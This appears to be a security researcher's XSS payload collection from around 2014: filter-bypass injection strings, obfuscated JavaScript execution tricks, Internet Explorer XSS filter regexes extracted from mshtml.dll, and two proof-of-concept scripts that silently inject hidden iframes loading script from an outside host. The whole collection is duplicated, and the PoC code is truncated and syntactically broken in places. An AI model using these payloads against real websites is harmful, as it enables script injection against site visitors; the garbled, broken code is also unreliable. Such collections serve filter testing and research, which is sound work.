David Hoyt xsscx

## XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
/* Remote File Include with HTML TAGS via XSS.Cx  */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>

## gist:49d94bd502294b3be9a3
<meta charset=iso-2022-jp>%1B(B%1B><svg onload=alert(1)>%1B$B%1B
%20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{
%3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B(
%3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a=
%3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E
%1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B

## location='javascript:1+{}'
'() {'
document.createElement('img').src='javascript:while(1){}'
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>'
(function(a){alert(1)}).call()
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
p'rompt(1)
"(prompt(1))in"
parseInt("prompt",36);
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(1558153217..toString(36))(1)

## IE 11 XSS Filter Regular Expressions from MSHTML.DLL
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:}
{<a.*?hr{e}f}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<is{i}ndex[ /+\t>]}
{<fo{r}m.*?>}
{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}
{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}

## IEXSSFILTERREGEXP
======================================================
IE XSS REGEX RESULTS (As of 09/2011) for IE9
======================================================
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)

## IEXSSFILTERREGEXPIE10
======================================================
IE XSS REGEX RESULTS (As of 05/2013) for IE10
======================================================
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{<LI{N}K[ /+\t].*?href[ /+\t]*=}
{<BA{S}E[ /+\t].*?href[ /+\t]*=}
{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}

## XSS101
==============
XSS Expressions
==============
Key
==============
Operator
Injection
Reflection
==============
Addition & String Concatenation

## iFramer.js
============================================
XSS Exploit PoC #1 - iFramer
============================================
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://xss.cx/xss.js' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');

## iFramer2.js
============================================
XSS Exploit PoC #2
============================================
function cx () {
	try {
			for (var i = 0; i < navigator.plugins.length; i++) {
			if {name.indexOf("Media Player") != -1) {
				var m = document.create.Element("iframe");
				m.setAttribute("src", http://xss.cx/xss.js:);
				m.setAttribute("width", 0);

## findstr.txt
======================================================
Extract XSS Filters from MSHTML.DLL used in IE9
======================================================
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
======================================================
IE9 Summary - 23 Hardcoded Regex in mshtml.dll
======================================================
Fixed strings (2) javascript:, vbscript:
HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form
HTML attributes (3)  " datasrc, " style=, " on*= (event handlers)
	/* Remote File Include with HTML TAGS via XSS.Cx */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
	/* Updated September 29, 2014 */
	/* RFI START */
	<img language=vbs src=<b onerror=alert#1/1#>
	<isindex action="javas&Tab;cript:alert(1)" type=image>
	"]<img src=1 onerror=alert(1)>
	<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
	<meta charset=iso-2022-jp>%1B(B%1B><svg onload=alert(1)>%1B$B%1B
	%20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{
	%3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B(
	%3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a=
	%3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E
	%1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B
	'() {'
	document.createElement('img').src='javascript:while(1){}'
	'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>'
	(function(a){alert(1)}).call()
	{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
	p'rompt(1)
	"(prompt(1))in"
	parseInt("prompt",36);
	eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
	eval(1558153217..toString(36))(1)
	{[\"\'].?[{,].(((v\|(\\u0076)\|(\\166)\|(\\x76))[^a-z0-9]({a}\|(\\u00{6}1)\|(\\1{4}1)\|(\\x{6}1))[^a-z0-9](l\|(\\u006C)\|(\\154)\|(\\x6C))[^a-z0-9](u\|(\\u0075)\|(\\165)\|(\\x75))[^a-z0-9](e\|(\\u0065)\|(\\145)\|(\\x65))[^a-z0-9](O\|(\\u004F)\|(\\117)\|(\\x4F))[^a-z0-9](f\|(\\u0066)\|(\\146)\|(\\x66)))\|((t\|(\\u0074)\|(\\164)\|(\\x74))[^a-z0-9]({o}\|(\\u00{6}F)\|(\\1{5}7)\|(\\x{6}F))[^a-z0-9](S\|(\\u0053)\|(\\123)\|(\\x53))[^a-z0-9](t\|(\\u0074)\|(\\164)\|(\\x74))[^a-z0-9](r\|(\\u0072)\|(\\162)\|(\\x72))[^a-z0-9](i\|(\\u0069)\|(\\151)\|(\\x69))[^a-z0-9](n\|(\\u006E)\|(\\156)\|(\\x6E))[^a-z0-9](g\|(\\u0067)\|(\\147)\|(\\x67)))).?:}
	{<a.*?hr{e}f}
	{[\"\'][ ]*(([^a-z0-9~_:\'\" ])\|(in)).+?{[.]}.+?=}
	{[\"\'].?{\)}[ ](([^a-z0-9~_:\'\" ])\|(in)).+?{\(}}
	{[\"\'][ ](([^a-z0-9~_:\'\" ])\|(in)).+?{\(}.?{\)}}
	{<[i]?f{r}ame.?[ /+\t]?src[ /+\t]*=}
	{<is{i}ndex[ /+\t>]}
	{<fo{r}m.*?>}
	{<[?]?im{p}ort[ /+\t].?implementation[ /+\t]=}
	{<EM{B}ED[ /+\t].?((src)\|(type)).?=}
	======================================================
	IE XSS REGEX RESULTS (As of 09/2011) for IE9
	======================================================
	{(v\|(&[#()\[\].]x?0((86)\|(56)\|(118)\|(76));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(b\|(&[#()\[\].]x?0((66)\|(42)\|(98)\|(62));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(s\|(&[#()\[\].]x?0((83)\|(53)\|(115)\|(73));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(c\|(&[#()\[\].]x?0((67)\|(43)\|(99)\|(63));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?)){(r\|(&[#()\[\].]x?0((82)\|(52)\|(114)\|(72));?))}([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(i\|(&[#()\[\].]x?0((73)\|(49)\|(105)\|(69));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(p\|(&[#()\[\].]x?0((80)\|(50)\|(112)\|(70));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(t\|(&[#()\[\].]x?0((84)\|(54)\|(116)\|(74));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(:\|(&[#()\[\].]x?0*((58)\|(3A));?)).}
	{(j\|(&[#()\[\].]x?0((74)\|(4A)\|(106)\|(6A));?))([\t]\|(&[#()\[\].]x?0(9\|(13)\|(10)\|A\|D);?))(a\|(&[#()\[\].]x?0((65)\|(41)
	======================================================
	IE XSS REGEX RESULTS (As of 05/2013) for IE10
	======================================================
	{[\"\'][ ](([^a-z0-9~_:\'\" ])\|(in)).+?{\(}.?{\)}}
	{[\"\'].?[{,].(((v\|(\\u0076)\|(\\166)\|(\\x76))[^a-z0-9]({a}\|(\\u00{6}1)\|(\\1{4}1)\|(\\x{6}1))[^a-z0-9](l\|(\\u006C)\|(\\154)\|(\\x6C))[^a-z0-9](u\|(\\u0075)\|(\\165)\|(\\x75))[^a-z0-9](e\|(\\u0065)\|(\\145)\|(\\x65))[^a-z0-9](O\|(\\u004F)\|(\\117)\|(\\x4F))[^a-z0-9](f\|(\\u0066)\|(\\146)\|(\\x66)))\|((t\|(\\u0074)\|(\\164)\|(\\x74))[^a-z0-9]({o}\|(\\u00{6}F)\|(\\1{5}7)\|(\\x{6}F))[^a-z0-9](S\|(\\u0053)\|(\\123)\|(\\
	{[\"\'][ ]*(([^a-z0-9~_:\'\" ])\|(in)).+?{[.]}.+?=}
	{[\"\'].?{\)}[ ](([^a-z0-9~_:\'\" ])\|(in)).+?{\(}}
	{<LI{N}K[ /+\t].?href[ /+\t]=}
	{<BA{S}E[ /+\t].?href[ /+\t]=}
	{<ME{T}A[ /+\t].?http-equiv[ /+\t]=}
	==============
	XSS Expressions
	==============
	Key
	==============
	Operator
	Injection
	Reflection
	==============
	Addition & String Concatenation
	============================================
	XSS Exploit PoC #1 - iFramer
	============================================
	if (document.getElementsByTagName('body')[0]) {
	iframer();
	} else {
	document.write("<iframe src='http://xss.cx/xss.js' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
	}
	function iframer() {
	var f = document.createElement('iframe');
	============================================
	XSS Exploit PoC #2
	============================================
	function cx () {
	try {
	for (var i = 0; i < navigator.plugins.length; i++) {
	if {name.indexOf("Media Player") != -1) {
	var m = document.create.Element("iframe");
	m.setAttribute("src", http://xss.cx/xss.js:);
	m.setAttribute("width", 0);
	======================================================
	Extract XSS Filters from MSHTML.DLL used in IE9
	======================================================
	findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll\|find "{"
	======================================================
	IE9 Summary - 23 Hardcoded Regex in mshtml.dll
	======================================================
	Fixed strings (2) javascript:, vbscript:
	HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form
	HTML attributes (3) " datasrc, " style=, " on*= (event handlers)